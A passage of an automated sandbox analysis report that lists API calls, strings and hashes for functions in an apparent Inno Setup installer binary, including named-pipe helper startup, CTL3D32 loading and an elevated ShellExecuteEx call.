                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                  • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                  • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                  • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                  Function 00450900 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                    • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 734332943-0
                                                                  • Opcode ID: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                  • Instruction ID: b7b79c15840fa76abef9437e43e4f8825fb2e58c400bd883dda953f657da4aaf
                                                                  • Opcode Fuzzy Hash: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                  • Instruction Fuzzy Hash: A9C09BB93011158BDF50E6FEC5C1D0763DC6F5C30A7514166BD04CF207E668DC154B18
                                                                  Function 00407298 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID:
                                                                  • API String ID: 1611563598-0
                                                                  • Opcode ID: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                                  • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                  • Opcode Fuzzy Hash: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                                  • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                  Function 0042E3E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                  • Instruction ID: 0a31ae7c3a111c16d424c34ef622fbdc70eb0dd2bd2df7fa5b045972c40067f9
                                                                  • Opcode Fuzzy Hash: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                                  • Instruction Fuzzy Hash: C5B09B7670C6105DA719DED5B45552D63D4D7C47207E14477F000D2581D97C58014A18
                                                                  Function 004165E4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                  • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                  • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                  • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                  Function 00448720 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                                  • Instruction ID: 536338a183f72747ee396c39aaf2d9ae1316c242f91420f2fc1fbbab771670b7
                                                                  • Opcode Fuzzy Hash: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                                  • Instruction Fuzzy Hash: 73519770E042099FEB00EFA5C892AAEBBF5EF49714F50417AE504E7351DB389E41CB98
                                                                  Function 0047D57C Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 626452242-0
                                                                  • Opcode ID: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                  • Instruction ID: ceed5698e636368dfd76c0cd730b865cf5009e2f8cb46b99e2292a0b329ee420
                                                                  • Opcode Fuzzy Hash: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                  • Instruction Fuzzy Hash: 7C518170A14245AFDB20DF55D8C5BAABBF9EF29304F108077E808A73A1C778AD45CB59
                                                                  Function 0041F3BC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                  • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                                  • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                  • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                                  Function 00452F98 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                  • Instruction ID: 3c34fb880e90b623eb2bb31e9ea66b18baec95e7b0c87dab0e1dfc6834c7d9d6
                                                                  • Opcode Fuzzy Hash: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                  • Instruction Fuzzy Hash: 98014C356042046A8B15DF699C008AEFBE8EB4E72175046B7FC24D3382D6344E059798
                                                                  Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001370,00005373,00401973), ref: 00401766
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                  • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                  • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                  • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                  Function 00406F38 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                  • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                  • Opcode Fuzzy Hash: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                  • Instruction Fuzzy Hash:

                                                                  Non-executed Functions

                                                                  Function 0041F110 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                  • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                  • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                  • API String ID: 2323315520-3614243559
                                                                  • Opcode ID: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                  • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                                  • Opcode Fuzzy Hash: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                  • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                                  Function 004583E8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0045844F
                                                                  • QueryPerformanceCounter.KERNEL32(02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 00458458
                                                                  • GetSystemTimeAsFileTime.KERNEL32(02213858,02213858), ref: 00458462
                                                                  • GetCurrentProcessId.KERNEL32(?,02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 0045846B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02213858,02213858), ref: 004584EF
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                                  • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                  • API String ID: 770386003-3271284199
                                                                  • Opcode ID: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                  • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                                  • Opcode Fuzzy Hash: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                  • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                                  Function 00477F98 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                    • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                    • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                    • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC), ref: 00477E60
                                                                    • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                    • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02212BEC,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                                  • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                                  • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                  • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                  • API String ID: 883996979-2356621170
                                                                  • Opcode ID: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                  • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                                  • Opcode Fuzzy Hash: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                  • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                                  Function 00422854 Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
